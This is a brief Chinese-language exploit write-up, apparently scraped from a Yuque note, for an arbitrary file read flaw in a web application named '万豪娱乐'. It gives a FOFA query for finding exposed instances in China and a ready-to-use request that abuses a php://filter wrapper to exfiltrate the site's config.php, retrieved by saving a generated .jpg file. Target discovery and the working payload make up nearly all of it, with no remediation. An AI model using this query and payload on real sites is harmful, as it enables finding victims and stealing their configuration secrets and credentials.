登录 白背景
源码

万豪娱乐存在任意文件读取漏洞

一、漏洞简介

万豪娱乐存在任意文件读取漏洞

<font style="color:rgb(51, 51, 51);">二、资产测绘</font>

  • fofa"Public/Js/Mobile" && country="CN"
  • 特征

1732603661176-cb3a2a28-7d6a-40d4-9d80-fd111ca79567.png

三、漏洞复现

/Home/game/getimg?url=php://filter/read=convert.base64-encode/resource=Application/Common/Conf/config.php&id=1993

<font style="color:rgb(52, 73, 94);">使用poc访问后,接着访问 /public/gamelist/1993.jpg 的图片,保存下来就是读取到的内容</font>

原文: https://www.yuque.com/xiaokp7/ocvun2/ifd65o9r8hm8m0ac